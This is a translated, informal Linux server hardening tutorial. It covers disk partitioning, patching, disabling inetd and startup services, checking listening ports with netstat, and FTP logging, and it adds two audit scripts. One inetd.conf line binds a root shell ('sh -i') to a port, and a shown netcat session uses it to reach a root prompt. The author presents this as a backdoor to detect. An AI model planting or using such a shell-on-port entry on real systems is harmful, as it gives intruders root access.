This article is meant to give the reader a general understanding of Linux security configuration. I have read a few other articles on the subject, and honestly I think the basic security configuration of a Linux box is only a few minutes' work, heh heh.

1. Installation

We are all familiar with this. First, keep the machine isolated from the network while installing. Choose a custom installation and install only the packages you need.

Hard drive partitions: if the root partition holds data such as log files and email, a flood of log entries or spam can fill it up and cause a denial of service, or even crash the system. I recommend giving /var its own partition for logs and mail, so the root partition cannot be overrun, which is a miserable thing to clean up. It is best to give a separate partition to any particular application, especially programs that can produce excessive logs, and many people also suggest a separate /home so users cannot fill the / partition. Here are the partitions on one of my disks: /, /var, /log, /hacking (hee hee, some hacking tools), swap and /home, nothing more.

When the system restarts after installation finishes, the first thing to do is apply the vendor's security patches. Please develop this good habit; remember, this is not your Win98 box at home, treat it as a Linux server, heh. For Red Hat systems the patches are at http://www.redhat.com/corp/support/errata/. Red Hat 6.1 and later versions ship a tool called up2date, which works out which RPM packages on your system need upgrading and then downloads and installs them automatically from Red Hat's site.

2. Close unnecessary services

Heh, to put it bluntly: if you want your system absolutely secure, unplug the network cable. Of course our machines have to provide services to the outside, so that is not realistic, and shutting down the unnecessary services is the necessary alternative, because some of those services are a risk to your system. Linux is a powerful system by default and runs a lot of services, but many of them are not needed and easily become a security problem. The first file to look at is /etc/inetd.conf, which specifies the services that /usr/sbin/inetd listens for. You may only need two of them, telnet and FTP; many of the others, such as popd, imapd and rsh, are likely to cause security problems.
Use the following command to display the services that have not been commented out:

    suneagle# grep -v "#" /etc/inetd.conf
    ftp       stream  tcp  nowait  root        /usr/sbin/tcpd   in.ftpd -l -a
    telnet    stream  tcp  nowait  root        /usr/sbin/tcpd   in.telnetd
    shell     stream  tcp  nowait  root        /usr/sbin/tcpd   in.rshd
    login     stream  tcp  nowait  root        /usr/sbin/tcpd   in.rlogind
    talk      dgram   udp  wait    nobody.tty  /usr/sbin/tcpd   in.talkd
    ntalk     dgram   udp  wait    nobody.tty  /usr/sbin/tcpd   in.ntalkd
    pop-3     stream  tcp  nowait  root        /usr/sbin/tcpd   ipop3d
    imap      stream  tcp  nowait  root        /usr/sbin/tcpd   imapd
    finger    stream  tcp  nowait  nobody      /usr/sbin/tcpd   in.fingerd
    linuxconf stream  tcp  wait    root        /bin/linuxconf   linuxconf --http
    exec      stream  tcp  nowait  root        /bin/sh          sh -i

LOL, look at the last row: isn't that a root shell tied to a port? What are the consequences? Look what happens from a remote Win2000 machine with the following command:

    E:\cmd> nc 192.0.0.88 512
    bash# id
    uid=0(root) gid=0(root) groups=0(root)
    bash#

See? Heh heh, pay attention to this one. I have written another article about using this file to plant a backdoor, heh; seen from the defensive side, this same grep command helps you find out whether there is a backdoor in your inetd.conf.

Next are the startup scripts. The rc scripts run by the init process determine which services are started. On Red Hat systems these scripts live in /etc/rc.d/rc3.d (or /etc/rc.d/rc5.d if your system boots into X by default). To stop a service from starting, you only need to change the uppercase S at the front of its script name to a lowercase s. Red Hat also provides a tool to help you shut services down: run /usr/sbin/setup and choose "System services", and you can customize which services run at system startup. Another option is the chkconfig command, which many Linux distributions ship. The scripts are run in the numeric order of their names; those beginning with an uppercase K kill the process instead of starting it.
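The check the post does by hand with grep can be scripted so it runs the same way every time. The script below is an added example, not code from the original post: it lists the active (uncommented) inetd.conf entries, flags any entry whose server program is a shell (a root shell bound to a port, like the exec line above), and flags root-owned services that are not on an allowlist. The inetd.conf it reads is a constructed sample written to a temp file, modelled on the listing in the post.

```shell
#!/bin/sh
# Added example (not from the original post): audit an inetd.conf the way the
# post's `grep -v "#" /etc/inetd.conf` does, plus two extra checks.
# The sample inetd.conf below is constructed for this example.
SAMPLE_INETD=$(mktemp)
trap 'rm -f "$SAMPLE_INETD"' EXIT
cat > "$SAMPLE_INETD" <<'EOF'
# inetd.conf (constructed sample, modelled on the listing in the post)
ftp     stream  tcp     nowait  root        /usr/sbin/tcpd  in.ftpd -l -a
telnet  stream  tcp     nowait  root        /usr/sbin/tcpd  in.telnetd
#shell  stream  tcp     nowait  root        /usr/sbin/tcpd  in.rshd
pop-3   stream  tcp     nowait  root        /usr/sbin/tcpd  ipop3d
finger  stream  tcp     nowait  nobody      /usr/sbin/tcpd  in.fingerd
talk    dgram   udp     wait    nobody.tty  /usr/sbin/tcpd  in.talkd
exec    stream  tcp     nowait  root        /bin/sh         sh -i
EOF

# Active entries only: drop comment lines and anything too short to be an
# entry. inetd.conf fields: service, socket type, protocol, wait/nowait,
# user[.group], server program, server arguments...
inetd_active() {
    grep -v '^[[:space:]]*#' "$1" | awk 'NF >= 6 { print $1 }'
}

# Service names whose server program (field 6) or first argument (field 7)
# is a shell: such an entry is an interactive shell listening on a port.
inetd_shell_entries() {
    grep -v '^[[:space:]]*#' "$1" | awk '
        NF >= 6 && ($6 ~ "/(sh|bash|ksh|csh)$" || $7 ~ "^(sh|bash|ksh|csh)$") { print $1 }'
}

# Active services that run as root (field 5, ignoring a .group suffix) and
# are not in the allowlist passed as the remaining arguments.
inetd_root_not_allowed() {
    f=$1; shift
    allow=" $* "
    grep -v '^[[:space:]]*#' "$f" | awk -v allow="$allow" '
        NF >= 6 {
            split($5, u, ".")
            if (u[1] == "root" && index(allow, " " $1 " ") == 0) print $1
        }'
}

echo "active services:       $(inetd_active "$SAMPLE_INETD" | tr '\n' ' ')"
echo "shell bound to a port: $(inetd_shell_entries "$SAMPLE_INETD" | tr '\n' ' ')"
echo "root, not allowlisted: $(inetd_root_not_allowed "$SAMPLE_INETD" ftp telnet | tr '\n' ' ')"
```

Point the functions at the real /etc/inetd.conf instead of the sample and put the services you actually intend to offer in the allowlist; anything the second or third function prints deserves a look before the machine goes on the network.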
The following are some of the major startup scripts:

    S05apmd        power management, needed on notebooks
    S10xntpd       network time protocol
    S11portmap     required for running RPC services
    S15sound       sound card related
    S15netfs       NFS client
    S20rstatd      avoid running this; remote users can get a lot of information
    S20rusersd     same as above
    S20rwhod       same as above
    S20rwalld      same as above
    S20bootparamd  diskless workstations
    S25squid       proxy service
    S34yppasswdd   NIS server; this service has many vulnerabilities
    S35ypserv      NIS server; this service has many vulnerabilities
    S35dhcpd       DHCP service
    S40atd         very similar to cron, runs scheduled jobs
    S45pcmcia      PCMCIA cards, notebooks
    S50snmpd       SNMP; remote users can get a lot of system information
    S55named       DNS service
    S55routed      RIP; there is no need to keep it running
    S60lpd         print service
    S60mars-nwe    NetWare file and print services
    S60nfs         NFS server; many vulnerabilities
    S72amd         automount, mounts remote filesystems
    S75gated       another routing daemon, e.g. OSPF
    S80sendmail    mail service; if you close it you can still send mail, you just cannot receive it
    S85httpd       web server
    S87ypbind      NIS client
    S90xfs         X font server
    S95innd        news server
    Slinuxconf     we are all familiar with this one, heh: remote management of the system through a browser

Before you close any startup scripts, use this command to see how many processes are running:

    suneagle# ps -eaf | wc -l
    54

My system has 54 processes running. After you close some services, run the command again and see how much smaller the number is. The fewer services running, the more secure the system.
Use the following command to see which services are listening and which connections are open:

    suneagle# netstat -na --ip
    Active Internet connections (servers and established)
    Proto Recv-Q Send-Q Local Address           Foreign Address         State
    tcp        0    136 192.0.0.88:23           192.0.0.5:1236          ESTABLISHED
    tcp        0      0 192.0.0.88:23           192.0.0.8:1113          ESTABLISHED
    tcp        0      0 192.0.0.88:139          192.0.0.8:1112          ESTABLISHED
    tcp        0      0 192.0.0.88:1024         61.153.17.24:23         ESTABLISHED
    tcp        0      0 192.0.0.88:23           192.0.0.8:1084          ESTABLISHED
    tcp        0      0 0.0.0.0:139             0.0.0.0:*               LISTEN
    tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN
    tcp        0      0 0.0.0.0:25              0.0.0.0:*               LISTEN
    tcp        0      0 0.0.0.0:515             0.0.0.0:*               LISTEN
    tcp        0      0 0.0.0.0:512             0.0.0.0:*               LISTEN
    tcp        0      0 0.0.0.0:98              0.0.0.0:*               LISTEN
    tcp        0      0 0.0.0.0:79              0.0.0.0:*               LISTEN
    tcp        0      0 0.0.0.0:143             0.0.0.0:*               LISTEN
    tcp        0      0 0.0.0.0:110             0.0.0.0:*               LISTEN
    tcp        0      0 0.0.0.0:513             0.0.0.0:*               LISTEN
    tcp        0      0 0.0.0.0:514             0.0.0.0:*               LISTEN
    tcp        0      0 0.0.0.0:23              0.0.0.0:*               LISTEN
    tcp        0      0 0.0.0.0:21              0.0.0.0:*               LISTEN
    tcp        0      0 0.0.0.0:113             0.0.0.0:*               LISTEN
    tcp        0      0 0.0.0.0:111             0.0.0.0:*               LISTEN
    udp     1024      0 127.0.0.1:              0.0.0.0:*
    udp        0      0 192.0.0.88:138          0.0.0.0:*
    udp        0      0 192.0.0.88:137          0.0.0.0:*
    udp        0      0 0.0.0.0:138             0.0.0.0:*
    udp        0      0 0.0.0.0:137             0.0.0.0:*
    udp        0      0 0.0.0.0:518             0.0.0.0:*
    udp        0      0 0.0.0.0:517             0.0.0.0:*
    udp        0      0 0.0.0.0:111             0.0.0.0:*
    raw        0      0 0.0.0.0:1               0.0.0.0:*               7
    raw        0      0 0.0.0.0:6               0.0.0.0:*               7

Oh, my system is a test box, so I deliberately opened many dangerous ports; don't learn from me on this one, ha ha.

3. Logging

Besides closing unnecessary services, the logs also need our attention. A well-configured Unix logging system is very powerful, and you can even set traps with it. I could ramble on about logging at length; here I only touch on it, and interested friends can consult the relevant references or read my other article on the principles of Solaris system logging. All logs are under /var/log (on Linux systems). The default Linux logging is already strong, with the exception of ftp.
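Reading a netstat listing by eye works once; what you want after hardening is a repeatable check that the set of listening TCP ports is exactly the set you intended, so that a new listener stands out. The script below is an added example, not code from the original post: it reduces netstat output to the TCP ports in LISTEN state and diffs them against an allowlist. The netstat output it parses is a constructed sample written to a temp file, modelled on the listing above (port 512 is the one the exec entry in inetd.conf listens on).

```shell
#!/bin/sh
# Added example (not from the original post): summarise `netstat -na --ip`
# output down to the listening TCP ports and compare them with an allowlist.
# The netstat output below is a constructed sample for this example.
SAMPLE_NETSTAT=$(mktemp)
trap 'rm -f "$SAMPLE_NETSTAT"' EXIT
cat > "$SAMPLE_NETSTAT" <<'EOF'
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0    136 192.0.0.88:23           192.0.0.5:1236          ESTABLISHED
tcp        0      0 0.0.0.0:139             0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:25              0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:512             0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:23              0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:21              0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:111             0.0.0.0:*               LISTEN
udp        0      0 0.0.0.0:111             0.0.0.0:*
EOF

# TCP listeners only (field 1 == tcp, field 6 == LISTEN). The port is whatever
# follows the last ':' of the local address, which also copes with IPv6.
listening_tcp_ports() {
    awk '$1 == "tcp" && $6 == "LISTEN" { n = split($4, a, ":"); print a[n] }' "$1" | sort -n
}

# Listening ports that are not in the allowlist given as the remaining args.
unexpected_ports() {
    f=$1; shift
    allow=" $* "
    for p in $(listening_tcp_ports "$f"); do
        case "$allow" in
            *" $p "*) ;;          # expected, say nothing
            *) echo "$p" ;;       # not on the list: a listener you did not plan
        esac
    done
}

echo "listening tcp ports:  $(listening_tcp_ports "$SAMPLE_NETSTAT" | tr '\n' ' ')"
echo "not on the allowlist: $(unexpected_ports "$SAMPLE_NETSTAT" 21 23 25 80 | tr '\n' ' ')"
```

On a live host, replace the sample file with `netstat -na --ip > /tmp/ns.txt` and pass that file in; running the check from cron and mailing any non-empty output is a cheap way to notice when something new starts listening.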
But we can modify /etc/inetd.conf or /etc/ftpaccess to make sure every FTP connection is logged. The following is an example of a modified inetd.conf line:

    ftp stream tcp nowait root /usr/sbin/tcpd in.ftpd -l -L -i -o

    -l  write each ftp connection to syslog
    -L  record every command the user issues
    -i  record files received in the xferlog
    -o  record files transmitted in the xferlog